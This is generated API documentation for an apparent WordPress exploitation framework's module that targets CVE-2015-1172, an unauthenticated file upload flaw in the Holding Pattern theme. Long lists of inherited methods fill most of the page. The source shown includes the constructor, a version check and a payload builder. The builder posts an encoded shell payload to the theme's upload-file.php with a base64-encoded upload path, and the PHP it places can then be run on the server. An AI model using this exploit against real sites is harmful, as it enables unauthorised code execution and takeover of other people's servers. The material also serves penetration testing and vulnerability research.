Class: Wpxf::Exploit::HoldingPatternShellUpload

Inherits:

SimplecartShellUpload

• Object
• Module
• SimplecartShellUpload
• Wpxf::Exploit::HoldingPatternShellUpload

Includes:

Wpxf

Defined in:

lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

• #check ⇒ Object
• #initialize ⇒ HoldingPatternShellUpload constructor

  A new instance of HoldingPatternShellUpload.

• #payload_body_builder(payload_name) ⇒ Object
• #plugin_url ⇒ Object
• #uploader_url ⇒ Object
• #uploads_url ⇒ Object

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from SimplecartShellUpload

#run

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ HoldingPatternShellUpload

Returns a new instance of HoldingPatternShellUpload.

# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 8

def initialize
  super

  update_info(
    name: 'Holding Pattern Theme Shell Upload',
    desc: 'This module exploits a file upload vulnerability in all versions '\
          'of the Holding Pattern theme found in the upload_file.php script '\
          'which contains no session or file validation. It allows '\
          'unauthenticated users to upload files of any type and '\
          'subsequently execute PHP scripts in the context of the '\
          'web server.',
    author: [
      'Alexander Borg', # Vulnerability disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['CVE', '2015-1172'],
      ['WPVDB', '7784']
    ],
    date: 'Feb 11 2015'
  )
end

Instance Method Details

#check ⇒ Object

# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 31

def check
  check_theme_version_from_readme('holding_pattern')
end

#payload_body_builder(payload_name) ⇒ Object

# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 47

def payload_body_builder(payload_name)
  target_ip = IPSocket.getaddress(target_host)
  field_name = Utility::Text.md5(target_ip)

  builder = Utility::BodyBuilder.new
  builder.add_file_from_string(field_name, payload.encoded, payload_name)
  builder.add_field('upload_path', 'Li4vdXBsb2Fkcw==')
  builder
end

#plugin_url ⇒ Object

# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 35

def plugin_url
  normalize_uri(wordpress_url_themes, 'holding_pattern')
end

#uploader_url ⇒ Object

# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 43

def uploader_url
  normalize_uri(plugin_url, 'admin', 'upload-file.php')
end

#uploads_url ⇒ Object

# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 39

def uploads_url
  normalize_uri(plugin_url, 'uploads/')
end